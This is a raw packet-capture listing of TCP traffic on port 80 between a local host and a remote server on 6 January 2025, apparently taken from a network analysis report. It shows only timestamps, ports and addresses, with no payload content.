                                                                                                                                                                        Jan 6, 2025 07:53:15.405940056 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405955076 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405970097 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405977964 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405994892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406037092 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.406826973 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406841993 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406856060 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406868935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406874895 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.406888962 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406908989 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.407665014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407680035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407701969 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407710075 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.407717943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407732964 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407744884 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.407774925 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.408473969 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408488989 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408503056 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408525944 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.408571959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408621073 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.450299025 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.450315952 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.450330019 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.450500011 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453119040 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453134060 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453146935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453190088 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453198910 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453211069 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453226089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453239918 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453260899 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453264952 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453309059 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.542376041 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542387009 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.542388916 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542413950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542437077 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.542458057 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.542476892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542490005 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542504072 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542519093 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542529106 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.542534113 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.542557955 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.543176889 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.543190002 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.543212891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.543234110 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.543236017 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.543247938 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.543260098 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.543271065 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.543277025 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.543286085 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.543332100 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.578960896 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.578993082 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579008102 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579037905 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579052925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579066992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579085112 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.579113960 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.579132080 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579148054 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579163074 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579197884 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.579571009 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579586029 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579602957 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579643011 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.579672098 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.579809904 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579824924 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579839945 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579854012 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579868078 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.579869986 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.579890966 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580055952 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580071926 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580091953 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580115080 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580116034 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580131054 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580142975 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580152035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580163956 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580167055 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580183983 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580214977 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580621958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580636978 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580657005 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580681086 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580694914 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580701113 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580701113 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580718994 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580734015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580749035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580755949 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580785990 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580790997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580806017 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580821991 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580837965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580842972 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580853939 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.580856085 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.580907106 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.581588984 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581604004 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581619024 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581639051 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.581645966 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581661940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581676006 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581691980 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.581691980 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581728935 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.581731081 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581746101 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581768036 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581772089 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.581782103 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581798077 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581804991 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.581813097 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.581830025 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.582557917 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.582572937 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.582601070 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.582613945 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.582614899 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.582628965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.582642078 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.582643032 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.582664967 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.622797012 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.626732111 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.626750946 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.626766920 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.626781940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.626812935 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.626862049 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.626864910 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.626880884 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.626904011 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.685436964 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715094090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715118885 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715130091 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715142012 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715152025 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715161085 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715172052 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715181112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715190887 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715200901 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715200901 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715212107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715221882 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715231895 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715240955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715245962 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715254068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715272903 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715281010 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715578079 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715590000 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715600014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715609074 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715619087 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715625048 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715635061 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715643883 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715647936 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715660095 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715691090 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715758085 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715769053 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715779066 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715795040 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715800047 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715806961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715816975 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715822935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715833902 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715854883 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716114998 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716130018 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716140032 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716152906 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716155052 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716169119 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716178894 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716178894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716191053 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716201067 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716206074 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716211081 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716219902 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716222048 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716233015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716242075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716250896 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716255903 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716262102 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716272116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716279984 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716281891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716295958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716299057 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716306925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716320038 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716332912 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716351986 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752613068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752628088 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752645016 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752655983 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752665997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752676010 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752679110 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752686024 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752736092 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752736092 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752743959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752756119 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752777100 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752990961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753007889 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753017902 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753031969 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753034115 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753046036 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753053904 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753057003 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753078938 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753127098 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753170967 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753173113 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753185034 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753206968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753211021 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753451109 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753462076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753472090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753480911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753493071 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753515005 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753799915 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753809929 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753819942 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753844023 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753859997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753865004 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753873110 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753884077 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753906012 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753916979 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753927946 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753950119 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753957033 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753973961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753989935 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839953899 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840580940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840601921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840611935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840635061 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840652943 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840682030 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840692997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840737104 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840751886 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840763092 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840773106 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840781927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840787888 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840826988 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840912104 CET8049739147.124.216.113192.168.2.4
